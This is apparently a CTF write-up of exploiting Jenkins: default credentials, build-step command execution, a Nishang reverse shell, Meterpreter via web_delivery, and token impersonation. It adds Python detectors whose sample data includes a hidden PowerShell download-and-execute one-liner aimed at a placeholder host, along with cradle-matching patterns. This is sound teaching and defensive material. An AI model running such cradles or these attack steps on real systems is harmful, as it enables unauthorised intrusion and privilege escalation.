Exploited Jenkins to gain an initial shell, then escalated privileges by exploiting Windows authentication tokens. Meterpreter was deployed with web_delivery.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use the information at your own risk. By continuing to read, you acknowledge the aforementioned user risks/responsibilities.
Nmap all ports:
Open Port Review:
Port 80 - Microsoft IIS httpd 7.5 - web server
Image bruce.jpg and an email address exposed.
Port 3389 - RDP (Remote Desktop)
Port 8080 - Jetty 9.4.z-SNAPSHOT - web server
A login attempt with admin:admin enabled access to the backend.
The version number is exposed as Jenkins ver. 2.190.1.
Under the “Build” section of /job/project/configure, running “whoami” as a build step shows that commands can be executed on the target system.
Using PowerShellTcp.ps1 from Nishang to create a reverse shell:
Github Link: https://github.com/samratashok/nishang.git
Creating a web server on the local machine via python3:
Adding the PowerShell command to the console “Build” section:
Listener setup: rlwrap allows the up, down, left and right arrow keys to work in the shell.
Upgrading the shell to a Meterpreter shell
Create a payload with msfvenom:
Download the reverse shell to the target:
Start the process with:
(In my case Meterpreter would hang and never fully connect to the handler. Moved to creating the Meterpreter session with web_delivery.)
Creating a Meterpreter shell via web_delivery
Took the generated code and executed it on the target:
Migrate to a higher-privileged process
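The build-step abuse and web_delivery stages above leave a distinctive trace on the Jenkins host: the JVM process that runs build steps spawns cmd.exe or powershell.exe with a download-and-execute command line. The Python script below is an added detection example, not part of the original writeup or of any tool it uses. It scores constructed Sysmon-style process-creation records (the field names follow Sysmon Event ID 1, while the host name, user names and the 192.0.2.10 URL are made up for the sample) and reports the records a defender would want to review.

```python
"""Flag process-creation events where a Jenkins build runner (a JVM)
spawns a shell that pulls and runs remote code, the pattern left by a
build step that launches a web_delivery-style PowerShell one-liner.

Added example; the records below are constructed, not real telemetry.
Field names follow Sysmon Event ID 1 (ProcessCreate); the same rule can
be adapted to 4688 events if command-line auditing is enabled.
"""
import re

# Parents that legitimately run build steps: the Jenkins controller or an
# agent, both of which are JVM processes.
BUILD_RUNNER_PARENTS = {"java.exe", "javaw.exe"}

# Child processes a Windows build step normally goes through.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Download-and-execute indicators. Each is weighted separately so a lone
# hit (e.g. IEX in a legitimate script) scores below the report threshold.
CRADLE_INDICATORS = [
    ("invoke-expression", r"\bIEX\b|Invoke-Expression", 2),
    ("download-cmdlet",   r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", 2),
    ("webclient",         r"Net\.WebClient", 1),
    ("no-profile",        r"-nop\b|-NoProfile", 1),
    ("hidden-window",     r"-w(indowstyle)?\s+hidden", 1),
    ("encoded-command",   r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 2),
    ("raw-ip-url",        r"https?://\d{1,3}(\.\d{1,3}){3}(:\d+)?/", 1),
]


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_command_line(cmdline):
    """Return (score, [matched indicator names]) for one command line."""
    score, hits = 0, []
    for name, pattern, weight in CRADLE_INDICATORS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            score += weight
            hits.append(name)
    return score, hits


def detect_jenkins_cradles(events, threshold=3):
    """Return findings for events where a JVM build runner spawns a shell
    whose command line scores at or above `threshold`."""
    findings = []
    for ev in events:
        parent = _basename(ev.get("ParentImage", ""))
        child = _basename(ev.get("Image", ""))
        if parent not in BUILD_RUNNER_PARENTS or child not in SHELL_CHILDREN:
            continue
        score, hits = score_command_line(ev.get("CommandLine", ""))
        if score >= threshold:
            findings.append({"RecordId": ev.get("RecordId"), "User": ev.get("User"),
                             "Child": child, "Score": score, "Indicators": hits})
    return findings


# Constructed sample records (host, users and URL are placeholders).
JAVA = "C:\\Program Files\\Java\\jre\\bin\\java.exe"
SAMPLE_EVENTS = [
    {"RecordId": 1, "User": "BUILDHOST\\bruce", "ParentImage": JAVA,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c call msbuild project.sln /p:Configuration=Release"},
    {"RecordId": 2, "User": "BUILDHOST\\bruce", "ParentImage": JAVA,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
                    ".downloadstring('http://192.0.2.10:8080/'))\""},
    {"RecordId": 3, "User": "BUILDHOST\\alice",
     "ParentImage": "C:\\Windows\\explorer.exe",  # not a build runner: skipped
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -c IEX (Get-Content helper.ps1 -Raw)"},
    {"RecordId": 4, "User": "BUILDHOST\\bruce", "ParentImage": JAVA,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File build.ps1"},  # below threshold
]

if __name__ == "__main__":
    for f in detect_jenkins_cradles(SAMPLE_EVENTS):
        print(f"record {f['RecordId']}: {f['User']} -> {f['Child']} "
              f"score={f['Score']} {f['Indicators']}")
```

Only record 2 is reported: the parent filter drops the explorer.exe case even though it contains IEX, and the plain `-NoProfile -File` build scores 1. Tune the threshold against your own build history, and pair the rule with Jenkins' own audit trail so that the job and the user who edited its configuration can be tied to the process event.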
Windows User Impersonation
Investigate the privileges of bruce:
From this we are able to exploit the privileges shown as enabled:
Load Incognito and list tokens within Meterpreter:
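The token-impersonation step works because the account the build runner executes as holds token privileges that let a process step into another user's security context. The Python script below is an added audit example, not part of the original writeup or of Incognito; it parses `whoami /priv` output and reports the privileges a defender should not see on a Jenkins service account. The two sample outputs are constructed for the example. The fix on the Jenkins side is to run the controller or agent under a dedicated low-privilege user rather than LOCAL SERVICE, NETWORK SERVICE or an administrator, since the built-in service accounts receive SeImpersonatePrivilege by default.

```python
"""Parse `whoami /priv` output and report token privileges that let a
process acquire another account's security context.

Added example; both samples below are constructed, not captured output.
"""
import re

# Privileges widely treated as administrator-equivalent when held by a
# process whose commands an outsider can influence (a build step, here).
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate tokens of other logged-on accounts",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
    "SeDebugPrivilege": "open and manipulate any process",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# Descriptions contain spaces, so the state column is anchored at end of line.
_PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: 'Enabled' | 'Disabled'}; header lines are skipped."""
    privs = {}
    for line in text.splitlines():
        m = _PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def audit_privileges(text):
    """Return [(privilege, state, reason)] for high-risk privileges present.

    'Disabled' only means not currently enabled in the token; the holder
    can enable it at will, so disabled entries are reported as well."""
    return [(name, state, HIGH_RISK_PRIVILEGES[name])
            for name, state in parse_whoami_priv(text).items()
            if name in HIGH_RISK_PRIVILEGES]


# Constructed sample: the shape of output for a built-in service account.
SAMPLE_SERVICE_ACCOUNT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample: the shape of output for a standard user account.
SAMPLE_STANDARD_USER = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

if __name__ == "__main__":
    for label, sample in (("service account", SAMPLE_SERVICE_ACCOUNT),
                          ("standard user", SAMPLE_STANDARD_USER)):
        findings = audit_privileges(sample)
        print(f"{label}: {len(findings)} high-risk privilege(s)")
        for name, state, why in findings:
            print(f"  {name:32} {state:9} {why}")
```

Run against the account your Jenkins service actually uses (`whoami /priv` from a build step is the quickest way to see the effective token). A clean result looks like the standard-user sample; anything matching the service-account sample means every build step on that node runs with impersonation rights.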